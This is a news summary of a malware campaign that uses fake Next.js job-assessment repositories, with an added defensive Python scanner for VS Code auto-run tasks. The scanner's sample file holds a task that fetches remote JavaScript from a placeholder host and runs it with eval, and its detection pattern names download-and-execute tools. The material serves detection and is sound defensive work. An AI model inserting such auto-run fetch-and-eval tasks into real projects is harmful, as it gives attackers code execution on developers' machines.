A sophisticated campaign is targeting developers with malicious repositories disguised as authentic Next.js projects and technical job assessments in order to gain persistent access to their systems. The attacks use several entry points hosted on trusted platforms to trick developers into executing JavaScript that gives the attacker remote command and control directly in memory.
Threat actors are increasingly using job-themed lures to blend into the standard daily workflows of developers, making it difficult to distinguish malicious activity from routine tasks. This campaign relies on fake repositories hosted on trusted platforms like Bitbucket, often using professional-sounding names to attract individuals looking for employment opportunities. By framing the code as a required technical assessment, attackers significantly increase the likelihood that a developer will download and run the project without suspicion.
Analysis of the campaign reveals three primary methods of execution that all aim to run attacker-controlled code in memory. The first involves Visual Studio Code workspace automation, where malicious code is triggered the moment a developer opens and trusts a project folder. This is achieved through specific workspace configurations that automatically run tasks upon opening, reaching out to external domains to pull down the initial payload.
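As an added example (not code from the article or from Microsoft's report), the following defender-side check scans a repository's `.vscode/tasks.json` for tasks that VS Code runs automatically when a trusted folder is opened, the first execution path described above. It relies on VS Code's `runOptions.runOn: "folderOpen"` setting, which the article does not name, and on a constructed sample file.

```python
"""Scan a VS Code tasks.json for tasks that run automatically on folder open."""
import json
import re
from typing import Any

# Patterns that merit review in an auto-run task: remote fetches and inline code execution.
SUSPICIOUS = re.compile(
    r"https?://|\bcurl\b|\bwget\b|\bnode\s+-e\b|\bpowershell\b|Invoke-WebRequest|\beval\b",
    re.IGNORECASE,
)

def _strip_comments(text: str) -> str:
    """VS Code tolerates comments in tasks.json; json.loads does not (best-effort removal)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)

def _command_text(task: dict[str, Any]) -> str:
    """Flatten command plus args (plain strings or {value: ...} objects) into one string."""
    parts = [str(task.get("command", ""))]
    for arg in task.get("args", []):
        parts.append(str(arg["value"]) if isinstance(arg, dict) else str(arg))
    return " ".join(parts)

def find_auto_run_tasks(tasks_json: str) -> list[dict[str, Any]]:
    """Return one finding (label, flattened command, suspicious flag) per task
    configured with runOptions.runOn == "folderOpen"."""
    doc = json.loads(_strip_comments(tasks_json))
    findings = []
    for task in doc.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_text(task)
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                         "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings

# Constructed sample (not the campaign's real file): one benign auto-run task,
# one auto-run task that fetches and evaluates remote code, and one ordinary build task.
SAMPLE_TASKS_JSON = """{
  // constructed example
  "version": "2.0.0",
  "tasks": [
    {"label": "install deps", "type": "shell", "command": "npm", "args": ["ci"],
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "prepare", "type": "shell", "command": "node",
     "args": ["-e", "fetch('https://example.invalid/a.js').then(r => r.text()).then(eval)"],
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "build", "type": "shell", "command": "npm run build"}
  ]
}"""
```

Run it over a cloned repository's `.vscode/tasks.json` before opening the folder in VS Code; comment stripping is best-effort, so a parse failure on an unusual file is itself worth a manual look.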
A second path exploits the standard development cycle by embedding malicious logic within modified JavaScript libraries, such as those masquerading as common tools like jQuery. When a developer runs the standard command to start a local development server, the hidden code activates and fetches a loader. This loader then executes a payload within the Node.js environment, allowing the attacker to bypass traditional security checks that monitor for suspicious file creation on the disk.
The third method targets the application backend, where launching the server causes hidden logic within module or route files to execute. This loader exfiltrates the process environment to an external server and receives JavaScript in return to be executed within the server process. Regardless of which path is taken, the final payload profiles the host machine and establishes a unique identifier to track the compromised system and coordinate further actions.
Once the initial foothold is established, the malware transitions into a second-stage controller that provides the attackers with a persistent pathway for receiving and executing new tasks. By operating primarily in memory and avoiding the creation of traceable files on the hard drive, the campaign minimizes its footprint. This allows the threat actors to maintain long-term access to compromised developer machines, potentially leading to the theft of sensitive credentials or the injection of malicious code into legitimate software supply chains.
Source: Microsoft Flags Fake Next.js Job Repositories Pushing In-Memory Malware Attacks